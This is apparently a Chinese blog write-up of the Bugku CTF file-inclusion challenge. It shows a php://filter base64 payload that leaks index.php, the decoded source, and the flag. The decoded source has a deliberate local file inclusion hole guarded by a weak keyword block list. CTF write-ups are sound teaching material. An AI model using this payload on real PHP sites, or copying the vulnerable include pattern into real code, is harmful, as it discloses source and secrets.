Bugku文件包含WP

发布于:2023-01-10 ⋅ 阅读:(393) ⋅ 点赞:(0)

Bugku文件包含

构造payload: php://filter/read=convert.base64-encode/resource=index.php
页面会返回base64加密后的index.php内容,
77u/PGh0bWw+DQogICAgPHRpdGxlPkJ1Z2t1LXdlYjwvdGl0bGU+DQogICAgDQo8P3BocA0KCWVycm9yX3JlcG9ydGluZygwKTsNCglpZighJF9HRVRbZmlsZV0pe2VjaG8gJzxhIGhyZWY9Ii4vaW5kZXgucGhwP2ZpbGU9c2hvdy5waHAiPmNsaWNrIG1lPyBubzwvYT4nO30NCgkkZmlsZT0kX0dFVFsnZmlsZSddOw0KCWlmKHN0cnN0cigkZmlsZSwiLi4vIil8fHN0cmlzdHIoJGZpbGUsICJ0cCIpfHxzdHJpc3RyKCRmaWxlLCJpbnB1dCIpfHxzdHJpc3RyKCRmaWxlLCJkYXRhIikpew0KCQllY2hvICJPaCBubyEiOw0KCQlleGl0KCk7DQoJfQ0KCWluY2x1ZGUoJGZpbGUpOyANCi8vZmxhZzpmbGFne2FjMzJlZDJhYmU4OGEzMjk0MzRlYjI0NjlkNWRhOTQwfQ0KPz4NCjwvaHRtbD4NCg==
在这里插入图片描述

<html>
    <title>Bugku-web</
   
<?php
	error_reporting(0);
	if(!$_GET[file]){echo '<a href="./index.php?file=show.php">click me? no</a>';}
	$file=$_GET['file'];
	if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
		echo "Oh no!";
		exit();
	}
	include($file); 
//flag:flag{ac32ed2abe88a329434eb2469d5da940}
?>
</html>

网站公告

今日签到

点亮在社区的每一天
去签到

热门文章

最新发布